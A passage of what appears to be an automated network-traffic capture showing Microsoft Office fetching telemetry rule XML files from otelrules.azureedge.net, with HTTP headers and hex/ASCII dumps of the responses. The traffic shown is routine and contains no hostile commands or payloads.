                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:14 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:14 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1354
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                        ETag: "0x8DC582BE0662D7C"
                                                                        x-ms-request-id: eaaa7c64-b01e-003e-24fe-448e41000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165114Z-174f7845968ljs8phC1EWRe6en0000001630000000008awd
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:14 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        126192.168.2.44988613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:14 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:14 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:14 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1403
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                        ETag: "0x8DC582BDCDD6400"
                                                                        x-ms-request-id: bc5dfdd1-701e-005c-6a03-45bb94000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165114Z-174f7845968cdxdrhC1EWRg0en000000162000000000ttw9
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:14 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        127192.168.2.44988413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:14 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:14 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:14 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1391
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                        x-ms-request-id: df02ced2-c01e-0046-0352-442db9000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165114Z-174f7845968px8v7hC1EWR08ng00000016ag00000000y62q
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:14 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        128192.168.2.44988713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:14 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:14 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:14 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1366
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                        ETag: "0x8DC582BDF1E2608"
                                                                        x-ms-request-id: eea98567-901e-007b-3159-44ac50000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165114Z-174f7845968cdxdrhC1EWRg0en000000163g00000000nnsn
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:14 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        129192.168.2.44988813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:14 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:14 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:14 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1399
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                        ETag: "0x8DC582BE8C605FF"
                                                                        x-ms-request-id: 8a8d0990-701e-0021-2191-3f3d45000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165114Z-174f7845968kvnqxhC1EWRmf3g0000000t1g000000008uns
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:14 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        130192.168.2.44989013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:16 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:16 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:16 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1403
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                        x-ms-request-id: 17f40f6b-801e-00a3-7e91-3f7cfb000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165116Z-174f7845968xr5c2hC1EWRd0hn0000000r1g00000000eryp
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:16 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        131192.168.2.44988913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:16 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:16 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:16 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1362
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                        ETag: "0x8DC582BDF497570"
                                                                        x-ms-request-id: 397e82c6-401e-0067-0612-4509c2000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165116Z-174f7845968jrjrxhC1EWRmmrs00000016eg0000000012nb
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:16 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        132192.168.2.44989113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:16 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:17 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:16 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1366
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                        ETag: "0x8DC582BEA414B16"
                                                                        x-ms-request-id: c1465301-601e-0050-31f1-412c9c000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165116Z-174f7845968kdththC1EWRzvxn0000000khg00000000eg0r
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:17 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        133192.168.2.44989213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:16 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:17 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:16 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1399
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                        ETag: "0x8DC582BE1CC18CD"
                                                                        x-ms-request-id: a132b298-601e-0070-6cf9-43a0c9000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165116Z-174f7845968zgtf6hC1EWRqd8s0000000z1g00000000v5ar
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:17 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        134192.168.2.44989313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:16 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:17 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:16 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1362
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                        ETag: "0x8DC582BEB256F43"
                                                                        x-ms-request-id: 6460b669-f01e-00aa-725a-448521000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165116Z-174f7845968cpnpfhC1EWR3afc00000015wg000000006m7y
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:17 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        135192.168.2.44989513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:18 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:19 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:19 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1366
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                        ETag: "0x8DC582BE5B7B174"
                                                                        x-ms-request-id: 621fcd15-801e-008c-0d40-447130000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165119Z-174f7845968pght8hC1EWRyvxg000000097000000000y17z
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:19 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
